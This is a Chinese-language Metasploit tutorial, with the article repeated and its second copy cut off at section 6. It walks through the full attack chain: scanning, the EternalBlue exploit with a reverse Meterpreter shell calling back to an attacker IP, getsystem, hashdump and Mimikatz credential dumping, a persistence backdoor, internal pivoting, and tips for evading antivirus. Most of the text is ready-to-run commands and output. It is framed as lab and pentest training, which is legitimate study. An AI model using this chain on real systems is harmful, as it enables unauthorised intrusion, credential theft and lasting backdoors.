1. 项目概述从零上手Metasploit的实战指南如果你刚接触网络安全或者对那个传说中的“瑞士军刀”Metasploit充满好奇但一打开终端就被满屏的模块和命令搞得头晕那么你来对地方了。这篇内容不是官方文档的复读机而是我作为一个在渗透测试和红队演练里泡了快十年的老手结合无数次实战和教学经验为你梳理的一条从“知道”到“会用”的清晰路径。我们聚焦于最核心、最实用的三个部分辅助模块Auxiliary、漏洞利用模块Exploits和后渗透模块Meterpreter。别被这些术语吓到你可以把它们理解成一个标准攻击链的“侦察兵”、“爆破手”和“特种部队”。收藏这篇不是因为它标题这么说而是因为我会把那些官方手册里一笔带过、但实际操作中能让你少走几小时弯路的细节和“坑”都摊开来讲明白。Metasploit FrameworkMSF的强大在于其模块化。很多人一上来就想搞个“大新闻”直接use exploit/windows/smb/ms17_010_eternalblue结果发现连目标IP都没扫对或者payload根本传不上去。这就像还没学会瞄准就扣扳机纯属浪费子弹。我们的目标是通过理解auxiliary、exploits、meterpreter这三个核心组件的工作逻辑和协作方式让你能独立完成一次从信息收集到获取权限的基础渗透测试流程。无论你是想在合规的靶机环境比如DC-1、Vulnhub上的各种靶场里练手还是为了深入理解攻击原理以更好地进行防御这套基础方法论都是你的必经之路。2. 环境准备与核心概念扫盲在开始“舞刀弄枪”之前得先把“练功房”收拾利索并且搞清楚手里这些“兵器”都是干嘛的。这一部分我们解决两个最基础但最关键的问题用什么环境以及那些名词到底是什么意思。2.1 选择你的作战平台Kali Linux与MSF的安装绝大多数渗透测试者会选择Kali Linux作为主力系统因为它预装了海量的安全工具Metasploit Framework自然也在其中。如果你用的是Kali通常只需要在终端输入msfconsole命令即可启动。但有时预装版本可能不是最新或者你想在其他Linux发行版如Ubuntu上使用那么手动安装和更新是必备技能。对于非Kali系统安装MSF最推荐的方式是使用官方安装脚本。打开终端依次执行以下命令curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb msfinstall chmod 755 msfinstall ./msfinstall这个过程会联网下载并安装最新版本的Metasploit及其所有依赖。安装完成后同样通过msfconsole启动。注意安装过程需要良好的网络环境因为要下载的组件体积不小。在某些网络环境下可能会比较慢耐心等待即可。安装完成后建议立即运行msfupdate命令来更新所有模块到最新状态漏洞库和利用技术日新月异保持更新至关重要。启动MSF控制台后你会看到一个炫酷的ASCII艺术logo和msf6 这样的提示符。这个msf6代表当前主版本号。到这里你的“作战指挥中心”就搭建完毕了。2.2 核心三剑客Auxiliary, Exploits, Meterpreter 到底是什么很多人看了很多教程还是分不清这三者的关系和区别。我用一个简单的军事行动来类比辅助模块Auxiliary这是你的“侦察兵”和“工程兵”。它们不直接获取系统权限而是执行信息收集、扫描、指纹识别、服务枚举、密码爆破、拒绝服务测试等任务。比如用auxiliary/scanner/portscan/tcp扫描目标开放了哪些端口用auxiliary/scanner/smb/smb_version识别目标Windows系统的SMB版本判断它是否可能存在永恒之蓝漏洞。它的核心价值在于为后续攻击提供情报支持。漏洞利用模块Exploits这是你的“突击队”或“爆破手”。它们利用目标系统或应用中的已知漏洞CVE编号执行特定的攻击代码目的是在目标上打开一个突破口通常是为了植入并执行一个Payload有效载荷。比如exploit/windows/smb/ms17_010_eternalblue就是利用MS17-010漏洞的攻击模块。成功执行后它会尝试将我们指定的Payload比如一个Meterpreter传送到目标并运行。Meterpreter这是Metasploit最强大的后渗透Payload一种特殊的攻击载荷。你可以把它理解成成功突破防线后空降到敌后的“特种部队”。它运行在目标内存中通常无文件落地提供了一个功能极其丰富的交互式命令行界面。通过Meterpreter你可以进行文件操作、系统控制、权限提升、密码哈希抓取、键盘记录、内网渗透等高级操作。它不是独立模块而是作为exploit模块成功后的一个“成果”或“会话Session”存在。简单的关系链就是Auxiliary侦察- 发现弱点 -Exploit利用弱点- 投送Meterpreter Payload- 建立会话 - 进行后渗透。理解这个流程你就掌握了Metasploit最基本的作战逻辑。3. 侦察阶段Auxiliary模块的实战应用任何成功的攻击都始于高质量的情报。盲目攻击就像蒙着眼睛扔飞镖效率极低且容易触发警报。Auxiliary模块就是你的眼睛和耳朵。3.1 信息收集端口扫描与服务识别假设我们的目标是192.168.1.100。第一步我们想知道它开了哪些门端口。在msfconsole中我们使用搜索命令来查找扫描模块search portscan在结果中我们会看到auxiliary/scanner/portscan/tcp这个最常用的TCP端口扫描器。使用它use auxiliary/scanner/portscan/tcp show options # 查看需要设置的参数 set RHOSTS 192.168.1.100 # 设置目标 set PORTS 1-1000 # 设置扫描端口范围常用1-1000 run执行后你会看到类似80/tcp open http、445/tcp open microsoft-ds这样的结果。发现开了445端口SMB服务这很可能是一台Windows主机并且是后续攻击的重点关注对象。仅仅知道端口号还不够我们需要知道端口上运行的具体服务及其版本。这时可以使用更精细的扫描器。例如针对SMB服务search smb_version use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.100 run这个模块会与目标的445端口通信并尝试获取Windows系统的NetBIOS名称、操作系统版本、SMB协议版本等详细信息。如果返回信息包含“Windows 7 Professional 7601 Service Pack 1”之类的字样结合端口信息攻击面就清晰了很多。实操心得不要一上来就用auxiliary/scanner/portscan/tcp扫全端口1-65535这既慢又吵。应该先快速扫描常见端口如1-1000, 或加上一些常见的高位端口如8080, 8443发现关键服务后再针对性地深入。对于SMB、RDP、SSH、HTTP/HTTPS这些高价值服务一定要用对应的版本探测模块_version去摸清底细。3.2 漏洞扫描与验证Auxiliary模块中还有一类是漏洞扫描器。它们比Nessus、OpenVAS等专业扫描器轻量但能快速验证特定漏洞是否存在。例如著名的MS17-010永恒之蓝漏洞也有对应的辅助扫描模块。search ms17_010 # 你会看到两个相关模块 # auxiliary/scanner/smb/smb_ms17_010 # 这是扫描器 # exploit/windows/smb/ms17_010_eternalblue # 这是利用模块 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.100 run如果返回[] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!那么恭喜或者为靶机默哀你已经找到了一个极有可能被攻破的入口。注意这只是“很可能”最终能否利用成功还需要Exploit模块来验证。这个阶段的关键是耐心和细致。你需要像侦探一样把目标的画像拼完整IP、开放端口、运行服务及版本、操作系统、可能的漏洞点。所有这些信息都会记录在你的笔记中成为下一步攻击的决策依据。4. 攻击突破Exploit模块的配置与执行侦察完毕确认了攻击点现在轮到Exploit模块上场了。这是整个过程中最激动人心也最容易出错的一环。4.1 选择与加载漏洞利用模块继续以MS17-010为例。根据侦察结果我们决定使用永恒之蓝攻击模块。use exploit/windows/smb/ms17_010_eternalblue加载模块后第一件事永远是show options。这个命令会列出模块的所有参数其中Required栏标记为yes的是你必须设置的。Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: , seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port这里有两个关键部分Module options和Payload options。模块选项主要配置目标信息而Payload选项配置我们攻击成功后希望目标回连到我们哪台机器、哪个端口。4.2 配置参数与Payload选择首先设置目标set RHOSTS 192.168.1.100接下来是Payload的选择和配置。show payloads命令可以列出当前Exploit模块兼容的所有Payload。对于Windows漏洞meterpreterpayload是首选因为它功能最强。我们通常选择反向连接reverse的Payload即让目标主动连接我们的攻击机这能绕过目标出站方向的防火墙限制。常见的反向TCP Meterpreter Payload有windows/meterpreter/reverse_tcp32位通用。windows/x64/meterpreter/reverse_tcp64位系统用兼容性更好。我们选择64位的set PAYLOAD windows/x64/meterpreter/reverse_tcp然后配置Payload选项set LHOST 192.168.1.50 # 这里填写你攻击机运行MSF的机器的IP地址 set LPORT 5555 # 监听端口可以自定义避免与常用服务冲突LHOST至关重要必须正确设置为攻击机可被目标访问的IP。如果是在NAT环境或虚拟机中这里容易设错。LPORT只要不冲突即可。4.3 执行攻击与结果分析所有参数设置完毕后可以先用check命令如果模块支持做最后一次漏洞存在性验证。虽然Auxiliary扫描器报可能但Exploit自己的check更精准。check如果返回The target is vulnerable.那就可以发起总攻了exploit # 或者 run接下来终端会滚动显示攻击过程尝试建立SMB连接、发送漏洞利用代码、在目标内存中布置Payload、触发Payload执行……如果你的所有配置正确且目标确实存在漏洞最终你会看到令人振奋的提示[*] Sending stage (200774 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.50:5555 - 192.168.1.100:49160) at 2023-10-27 10:00:00 0800 meterpreter 看到meterpreter 这个提示符意味着你已经成功在目标系统上植入并运行了Meterpreter并建立了一个交互式会话Session。攻击突破阶段圆满成功。注意事项Exploit执行失败非常常见。原因可能包括目标系统打了补丁、防火墙拦截了攻击流量、Payload与目标系统架构不匹配比如对64位系统用了32位Payload、网络不稳定等。失败时仔细查看exploit命令输出的错误信息是排查问题的第一步。常见的错误如Target is not vulnerable.说明漏洞不存在或已修补Connection reset by peer可能是触发了目标系统的防护机制A session was created, but then immediately died通常是Payload不稳定或被杀毒软件拦截。5. 权限维持与扩展Meterpreter后渗透实战拿到Meterpreter会话好比特种部队成功在敌后建立了据点。接下来的工作就是从这个据点出发扩大战果。5.1 Meterpreter基础命令与系统交互首先我们得知道自己是谁在哪台机器上。meterpreter sysinfo这个命令会显示目标计算机的基本信息操作系统、架构、计算机名等。接着查看当前权限meterpreter getuid如果返回的是NT AUTHORITY\SYSTEM那是最高的系统权限。如果返回的是普通用户如WIN-TEST\Administrator我们就需要考虑权限提升提权。在Meterpreter中操作文件系统和Shell感觉就像在本地操作一样。pwd/cd查看/切换目录。ls/dir列出文件。download C:\\Users\\Admin\\Desktop\\secret.txt /tmp/下载文件到攻击机。upload /home/kali/payload.exe C:\\Windows\\Temp\\上传文件到目标。shell切换到目标系统的标准命令行cmd或powershell。用完记得用exit命令退回到meterpreter否则会话可能不稳定。5.2 权限提升与哈希抓取如果当前不是系统权限尝试使用Meterpreter内置的提权模块meterpreter getsystem这个命令会尝试多种经典的Windows提权技术。如果成功getuid就会显示NT AUTHORITY\SYSTEM。但getsystem不是万能的现代系统防护越来越强。这时可以尝试使用MSF的其他本地提权Exploit模块这需要用到background命令将当前Meterpreter会话放到后台然后在MSF中搜索local_exploit_suggester模块来获取提权建议。获取了系统权限后一项关键任务是抓取密码哈希。在Windows中哈希值存储在SAM数据库中。Meterpreter提供了强大的哈希抓取功能meterpreter hashdump这个命令会尝试从内存或注册表中提取本地用户的NTLM哈希值。输出格式通常是用户名:RID:LM哈希:NT哈希。拿到NT哈希即NTLM hash后可以用于“哈希传递”Pass-the-Hash攻击在不破解密码的情况下直接利用哈希值访问网络中的其他资源这是内网横向移动的常用手段。实操心得hashdump命令在较高版本的Windows如Win10 1809之后 Server 2019上可能因为LSASS进程保护而失败。此时可以尝试使用kiwi模块加载Mimikatz功能或load mimikatz命令来抓取。命令如下meterpreter load kiwi meterpreter kiwi_cmd sekurlsa::logonpasswords这会从LSASS进程内存中提取明文密码、哈希、票据等信息成功率更高但可能触发更强的杀软告警。5.3 持久化与内网探测为了在目标重启后仍能保持访问需要建立持久化后门。Meterpreter的persistence脚本可以帮我们创建计划任务、服务或注册表启动项。meterpreter run persistence -X -i 30 -p 5555 -r 192.168.1.50-X系统启动时自动连接。-i 30每30秒尝试连接一次。-p 5555连接回连的端口。-r 192.168.1.50你的攻击机IP。执行后脚本会在目标上创建一个持久的后门并返回一个用于移除后门的命令务必记好。最后以当前攻陷的机器为跳板进行内网探测。首先获取目标内网网卡信息meterpreter ipconfig发现目标还有一张网卡处于172.16.1.0/24网段。我们可以添加一条路由让MSF的流量通过当前会话进入这个内网。meterpreter run autoroute -s 172.16.1.0/24添加路由后可以将当前会话放到后台background然后在MSF中像攻击第一台机器一样使用auxiliary/scanner/portscan/tcp等模块设置RHOSTS为172.16.1.0/24对整个内网段进行扫描开启新一轮的“侦察-攻击”循环。这就是一次完整的、由外到内的渗透测试雏形。6. 实战流程串联与避坑指南现在我们把前面所有步骤串联起来形成一个完整的、可复现的基础渗透测试流程。同时我会分享一些最容易让新手“翻车”的坑点及其解决方案。6.1 一次完整的攻击链演示假设目标是一台IP为192.168.2.150的未知主机。步骤一信息收集msf6 use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/portscan/tcp) set PORTS 1-1000 msf6 auxiliary(scanner/portscan/tcp) run [*] 发现开放端口22/tcp (ssh), 80/tcp (http), 445/tcp (smb)发现445端口深入侦察SMB。msf6 use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/smb/smb_version) run [*] 192.168.2.150:445 - Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)确认是一台未打补丁的Windows 7。步骤二漏洞验证与利用msf6 use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) set RHOSTS 192.168.2.150 msf6 auxiliary(scanner/smb/smb_ms17_010) run [] 192.168.2.150:445 - Host is likely VULNERABLE to MS17-010!扫描确认漏洞存在。发起攻击。msf6 use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) set RHOSTS 192.168.2.150 msf6 exploit(windows/smb/ms17_010_eternalblue) set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) set LHOST 192.168.2.1 # 攻击机IP msf6 exploit(windows/smb/ms17_010_eternalblue) set LPORT 4444 msf6 exploit(windows/smb/ms17_010_eternalblue) exploit [*] Sending stage ... Meterpreter session 1 opened. meterpreter 步骤三后渗透操作meterpreter sysinfo meterpreter getuid # 如果是普通用户 meterpreter getsystem # 尝试提权 meterpreter getuid # 确认提权成功 meterpreter hashdump # 抓取哈希 meterpreter run post/windows/manage/enable_rdp # 尝试开启远程桌面 meterpreter shell # 进入命令行添加用户等6.2 常见问题排查与避坑技巧实录在实际操作中你会遇到各种各样的问题。下面这个表格整理了我遇到最多的几种情况及其解决思路问题现象可能原因排查与解决思路exploit执行后无反应或很快失败1. 目标不存在该漏洞已打补丁。2. 网络不通或防火墙拦截。3. Payload不兼容如x86/x64混淆。1. 用check命令或辅助扫描器再确认。2. 用ping或auxiliary/scanner/portscan/tcp确认目标端口可达。3. 尝试更换Payload如windows/meterpreter/reverse_tcp和windows/x64/meterpreter/reverse_tcp互换。[*] Started reverse TCP handler...但一直不反弹会话1.LHOST设置错误如用了127.0.0.1。2. 目标出站防火墙阻止了连接到LPORT。3. Payload在目标执行失败被杀软拦截。1. 确保LHOST是攻击机能被目标访问到的IP在NAT/虚拟机中尤其注意。2. 尝试更换LPORT为80、443、53等常见出站允许端口。3. 尝试使用bind_tcp正向连接Payload或编码/加密的Payload如windows/x64/meterpreter/reverse_tcp的编码变体。Meterpreter会话建立后立即断开1. Payload不稳定或与系统冲突。2. 目标网络中断。3. 被终端安全软件AV/EDR杀死。1. 尝试使用reverse_https或reverse_winhttp等更稳定的Payload它们伪装成正常HTTPS流量。2. 使用set AutoRunScript migrate -f在攻击前设置自动迁移进程到稳定进程如explorer.exe。3. 考虑使用免杀技术或更轻量的Payload如shell_reverse_tcp。hashdump命令失败返回“未定义方法”权限不足或系统版本过高LSASS保护。1. 先getsystem提权。2. 加载kiwi模块load kiwi然后使用kiwi_cmd sekurlsa::logonpasswords。3. 使用post/windows/gather/hashdump后渗透模块。无法上传/下载文件1. 目录没有写权限。2. 磁盘空间不足。3. 被实时文件监控拦截。1. 尝试切换到C:\\Windows\\Temp等通常有写权限的目录。2. 检查磁盘空间shell进入后执行dir或wmic logicaldisk get size,freespace,caption。3. 尝试对文件进行编码或分片传输。几个关键的避坑技巧LHOST是万恶之源超过一半的连接问题都出在LHOST设置错误。在虚拟机环境中如果攻击机是KaliNAT模式目标靶机是同一宿主机的另一台虚拟机桥接模式那么Kali的LHOST不能设ifconfig看到的IP那是虚拟内网IP而应该设宿主机的物理IP或者使用0.0.0.0监听所有接口再配合端口转发。最稳妥的方法是在攻击机上用ip addr或ifconfig查看IP然后用靶机ping一下这个IP确保能通。Payload的稳定性优先对于初期学习reverse_tcp最简单。但在真实环境或较新靶机中优先使用reverse_https。它使用SSL/TLS加密通信更隐蔽且能更好地穿透防火墙和代理。善用search和infoMSF有上千个模块不要死记硬背。search命令支持按名称、类型、平台搜索。search type:exploit platform:windows smb。选中模块后info命令会显示详细的描述、作者、参考链接CVE、兼容性、选项说明等这是最好的学习资料。会话管理在MSF中用sessions -l列出所有活跃会话用sessions -i ID切换回某个会话。用background将当前Meterpreter会话放到后台会话保持而不是exit退出并关闭会话。多会话操作是内网渗透的基础。这套从Auxiliary侦察到Exploit突破再到Meterpreter后渗透的流程构成了Metasploit最基础也是最核心的使用逻辑。真正的熟练来自于在像DC-1、VulnHub这类靶场中的反复练习。每一次失败后的排查都会让你对网络、系统、协议和工具本身有更深的理解。记住工具是死的思路是活的。Metasploit给了你强大的武器库但如何组合运用这些武器制定攻击策略才是渗透测试艺术的开始。
Metasploit实战入门:从Auxiliary侦察到Meterpreter后渗透完整指南
1. 项目概述从零上手Metasploit的实战指南如果你刚接触网络安全或者对那个传说中的“瑞士军刀”Metasploit充满好奇但一打开终端就被满屏的模块和命令搞得头晕那么你来对地方了。这篇内容不是官方文档的复读机而是我作为一个在渗透测试和红队演练里泡了快十年的老手结合无数次实战和教学经验为你梳理的一条从“知道”到“会用”的清晰路径。我们聚焦于最核心、最实用的三个部分辅助模块Auxiliary、漏洞利用模块Exploits和后渗透模块Meterpreter。别被这些术语吓到你可以把它们理解成一个标准攻击链的“侦察兵”、“爆破手”和“特种部队”。收藏这篇不是因为它标题这么说而是因为我会把那些官方手册里一笔带过、但实际操作中能让你少走几小时弯路的细节和“坑”都摊开来讲明白。Metasploit FrameworkMSF的强大在于其模块化。很多人一上来就想搞个“大新闻”直接use exploit/windows/smb/ms17_010_eternalblue结果发现连目标IP都没扫对或者payload根本传不上去。这就像还没学会瞄准就扣扳机纯属浪费子弹。我们的目标是通过理解auxiliary、exploits、meterpreter这三个核心组件的工作逻辑和协作方式让你能独立完成一次从信息收集到获取权限的基础渗透测试流程。无论你是想在合规的靶机环境比如DC-1、Vulnhub上的各种靶场里练手还是为了深入理解攻击原理以更好地进行防御这套基础方法论都是你的必经之路。2. 环境准备与核心概念扫盲在开始“舞刀弄枪”之前得先把“练功房”收拾利索并且搞清楚手里这些“兵器”都是干嘛的。这一部分我们解决两个最基础但最关键的问题用什么环境以及那些名词到底是什么意思。2.1 选择你的作战平台Kali Linux与MSF的安装绝大多数渗透测试者会选择Kali Linux作为主力系统因为它预装了海量的安全工具Metasploit Framework自然也在其中。如果你用的是Kali通常只需要在终端输入msfconsole命令即可启动。但有时预装版本可能不是最新或者你想在其他Linux发行版如Ubuntu上使用那么手动安装和更新是必备技能。对于非Kali系统安装MSF最推荐的方式是使用官方安装脚本。打开终端依次执行以下命令curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb msfinstall chmod 755 msfinstall ./msfinstall这个过程会联网下载并安装最新版本的Metasploit及其所有依赖。安装完成后同样通过msfconsole启动。注意安装过程需要良好的网络环境因为要下载的组件体积不小。在某些网络环境下可能会比较慢耐心等待即可。安装完成后建议立即运行msfupdate命令来更新所有模块到最新状态漏洞库和利用技术日新月异保持更新至关重要。启动MSF控制台后你会看到一个炫酷的ASCII艺术logo和msf6 这样的提示符。这个msf6代表当前主版本号。到这里你的“作战指挥中心”就搭建完毕了。2.2 核心三剑客Auxiliary, Exploits, Meterpreter 到底是什么很多人看了很多教程还是分不清这三者的关系和区别。我用一个简单的军事行动来类比辅助模块Auxiliary这是你的“侦察兵”和“工程兵”。它们不直接获取系统权限而是执行信息收集、扫描、指纹识别、服务枚举、密码爆破、拒绝服务测试等任务。比如用auxiliary/scanner/portscan/tcp扫描目标开放了哪些端口用auxiliary/scanner/smb/smb_version识别目标Windows系统的SMB版本判断它是否可能存在永恒之蓝漏洞。它的核心价值在于为后续攻击提供情报支持。漏洞利用模块Exploits这是你的“突击队”或“爆破手”。它们利用目标系统或应用中的已知漏洞CVE编号执行特定的攻击代码目的是在目标上打开一个突破口通常是为了植入并执行一个Payload有效载荷。比如exploit/windows/smb/ms17_010_eternalblue就是利用MS17-010漏洞的攻击模块。成功执行后它会尝试将我们指定的Payload比如一个Meterpreter传送到目标并运行。Meterpreter这是Metasploit最强大的后渗透Payload一种特殊的攻击载荷。你可以把它理解成成功突破防线后空降到敌后的“特种部队”。它运行在目标内存中通常无文件落地提供了一个功能极其丰富的交互式命令行界面。通过Meterpreter你可以进行文件操作、系统控制、权限提升、密码哈希抓取、键盘记录、内网渗透等高级操作。它不是独立模块而是作为exploit模块成功后的一个“成果”或“会话Session”存在。简单的关系链就是Auxiliary侦察- 发现弱点 -Exploit利用弱点- 投送Meterpreter Payload- 建立会话 - 进行后渗透。理解这个流程你就掌握了Metasploit最基本的作战逻辑。3. 侦察阶段Auxiliary模块的实战应用任何成功的攻击都始于高质量的情报。盲目攻击就像蒙着眼睛扔飞镖效率极低且容易触发警报。Auxiliary模块就是你的眼睛和耳朵。3.1 信息收集端口扫描与服务识别假设我们的目标是192.168.1.100。第一步我们想知道它开了哪些门端口。在msfconsole中我们使用搜索命令来查找扫描模块search portscan在结果中我们会看到auxiliary/scanner/portscan/tcp这个最常用的TCP端口扫描器。使用它use auxiliary/scanner/portscan/tcp show options # 查看需要设置的参数 set RHOSTS 192.168.1.100 # 设置目标 set PORTS 1-1000 # 设置扫描端口范围常用1-1000 run执行后你会看到类似80/tcp open http、445/tcp open microsoft-ds这样的结果。发现开了445端口SMB服务这很可能是一台Windows主机并且是后续攻击的重点关注对象。仅仅知道端口号还不够我们需要知道端口上运行的具体服务及其版本。这时可以使用更精细的扫描器。例如针对SMB服务search smb_version use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.100 run这个模块会与目标的445端口通信并尝试获取Windows系统的NetBIOS名称、操作系统版本、SMB协议版本等详细信息。如果返回信息包含“Windows 7 Professional 7601 Service Pack 1”之类的字样结合端口信息攻击面就清晰了很多。实操心得不要一上来就用auxiliary/scanner/portscan/tcp扫全端口1-65535这既慢又吵。应该先快速扫描常见端口如1-1000, 或加上一些常见的高位端口如8080, 8443发现关键服务后再针对性地深入。对于SMB、RDP、SSH、HTTP/HTTPS这些高价值服务一定要用对应的版本探测模块_version去摸清底细。3.2 漏洞扫描与验证Auxiliary模块中还有一类是漏洞扫描器。它们比Nessus、OpenVAS等专业扫描器轻量但能快速验证特定漏洞是否存在。例如著名的MS17-010永恒之蓝漏洞也有对应的辅助扫描模块。search ms17_010 # 你会看到两个相关模块 # auxiliary/scanner/smb/smb_ms17_010 # 这是扫描器 # exploit/windows/smb/ms17_010_eternalblue # 这是利用模块 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.100 run如果返回[] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!那么恭喜或者为靶机默哀你已经找到了一个极有可能被攻破的入口。注意这只是“很可能”最终能否利用成功还需要Exploit模块来验证。这个阶段的关键是耐心和细致。你需要像侦探一样把目标的画像拼完整IP、开放端口、运行服务及版本、操作系统、可能的漏洞点。所有这些信息都会记录在你的笔记中成为下一步攻击的决策依据。4. 攻击突破Exploit模块的配置与执行侦察完毕确认了攻击点现在轮到Exploit模块上场了。这是整个过程中最激动人心也最容易出错的一环。4.1 选择与加载漏洞利用模块继续以MS17-010为例。根据侦察结果我们决定使用永恒之蓝攻击模块。use exploit/windows/smb/ms17_010_eternalblue加载模块后第一件事永远是show options。这个命令会列出模块的所有参数其中Required栏标记为yes的是你必须设置的。Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: , seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port这里有两个关键部分Module options和Payload options。模块选项主要配置目标信息而Payload选项配置我们攻击成功后希望目标回连到我们哪台机器、哪个端口。4.2 配置参数与Payload选择首先设置目标set RHOSTS 192.168.1.100接下来是Payload的选择和配置。show payloads命令可以列出当前Exploit模块兼容的所有Payload。对于Windows漏洞meterpreterpayload是首选因为它功能最强。我们通常选择反向连接reverse的Payload即让目标主动连接我们的攻击机这能绕过目标出站方向的防火墙限制。常见的反向TCP Meterpreter Payload有windows/meterpreter/reverse_tcp32位通用。windows/x64/meterpreter/reverse_tcp64位系统用兼容性更好。我们选择64位的set PAYLOAD windows/x64/meterpreter/reverse_tcp然后配置Payload选项set LHOST 192.168.1.50 # 这里填写你攻击机运行MSF的机器的IP地址 set LPORT 5555 # 监听端口可以自定义避免与常用服务冲突LHOST至关重要必须正确设置为攻击机可被目标访问的IP。如果是在NAT环境或虚拟机中这里容易设错。LPORT只要不冲突即可。4.3 执行攻击与结果分析所有参数设置完毕后可以先用check命令如果模块支持做最后一次漏洞存在性验证。虽然Auxiliary扫描器报可能但Exploit自己的check更精准。check如果返回The target is vulnerable.那就可以发起总攻了exploit # 或者 run接下来终端会滚动显示攻击过程尝试建立SMB连接、发送漏洞利用代码、在目标内存中布置Payload、触发Payload执行……如果你的所有配置正确且目标确实存在漏洞最终你会看到令人振奋的提示[*] Sending stage (200774 bytes) to 192.168.1.100 [*] Meterpreter session 1 opened (192.168.1.50:5555 - 192.168.1.100:49160) at 2023-10-27 10:00:00 0800 meterpreter 看到meterpreter 这个提示符意味着你已经成功在目标系统上植入并运行了Meterpreter并建立了一个交互式会话Session。攻击突破阶段圆满成功。注意事项Exploit执行失败非常常见。原因可能包括目标系统打了补丁、防火墙拦截了攻击流量、Payload与目标系统架构不匹配比如对64位系统用了32位Payload、网络不稳定等。失败时仔细查看exploit命令输出的错误信息是排查问题的第一步。常见的错误如Target is not vulnerable.说明漏洞不存在或已修补Connection reset by peer可能是触发了目标系统的防护机制A session was created, but then immediately died通常是Payload不稳定或被杀毒软件拦截。5. 权限维持与扩展Meterpreter后渗透实战拿到Meterpreter会话好比特种部队成功在敌后建立了据点。接下来的工作就是从这个据点出发扩大战果。5.1 Meterpreter基础命令与系统交互首先我们得知道自己是谁在哪台机器上。meterpreter sysinfo这个命令会显示目标计算机的基本信息操作系统、架构、计算机名等。接着查看当前权限meterpreter getuid如果返回的是NT AUTHORITY\SYSTEM那是最高的系统权限。如果返回的是普通用户如WIN-TEST\Administrator我们就需要考虑权限提升提权。在Meterpreter中操作文件系统和Shell感觉就像在本地操作一样。pwd/cd查看/切换目录。ls/dir列出文件。download C:\\Users\\Admin\\Desktop\\secret.txt /tmp/下载文件到攻击机。upload /home/kali/payload.exe C:\\Windows\\Temp\\上传文件到目标。shell切换到目标系统的标准命令行cmd或powershell。用完记得用exit命令退回到meterpreter否则会话可能不稳定。5.2 权限提升与哈希抓取如果当前不是系统权限尝试使用Meterpreter内置的提权模块meterpreter getsystem这个命令会尝试多种经典的Windows提权技术。如果成功getuid就会显示NT AUTHORITY\SYSTEM。但getsystem不是万能的现代系统防护越来越强。这时可以尝试使用MSF的其他本地提权Exploit模块这需要用到background命令将当前Meterpreter会话放到后台然后在MSF中搜索local_exploit_suggester模块来获取提权建议。获取了系统权限后一项关键任务是抓取密码哈希。在Windows中哈希值存储在SAM数据库中。Meterpreter提供了强大的哈希抓取功能meterpreter hashdump这个命令会尝试从内存或注册表中提取本地用户的NTLM哈希值。输出格式通常是用户名:RID:LM哈希:NT哈希。拿到NT哈希即NTLM hash后可以用于“哈希传递”Pass-the-Hash攻击在不破解密码的情况下直接利用哈希值访问网络中的其他资源这是内网横向移动的常用手段。实操心得hashdump命令在较高版本的Windows如Win10 1809之后 Server 2019上可能因为LSASS进程保护而失败。此时可以尝试使用kiwi模块加载Mimikatz功能或load mimikatz命令来抓取。命令如下meterpreter load kiwi meterpreter kiwi_cmd sekurlsa::logonpasswords这会从LSASS进程内存中提取明文密码、哈希、票据等信息成功率更高但可能触发更强的杀软告警。5.3 持久化与内网探测为了在目标重启后仍能保持访问需要建立持久化后门。Meterpreter的persistence脚本可以帮我们创建计划任务、服务或注册表启动项。meterpreter run persistence -X -i 30 -p 5555 -r 192.168.1.50-X系统启动时自动连接。-i 30每30秒尝试连接一次。-p 5555连接回连的端口。-r 192.168.1.50你的攻击机IP。执行后脚本会在目标上创建一个持久的后门并返回一个用于移除后门的命令务必记好。最后以当前攻陷的机器为跳板进行内网探测。首先获取目标内网网卡信息meterpreter ipconfig发现目标还有一张网卡处于172.16.1.0/24网段。我们可以添加一条路由让MSF的流量通过当前会话进入这个内网。meterpreter run autoroute -s 172.16.1.0/24添加路由后可以将当前会话放到后台background然后在MSF中像攻击第一台机器一样使用auxiliary/scanner/portscan/tcp等模块设置RHOSTS为172.16.1.0/24对整个内网段进行扫描开启新一轮的“侦察-攻击”循环。这就是一次完整的、由外到内的渗透测试雏形。6. 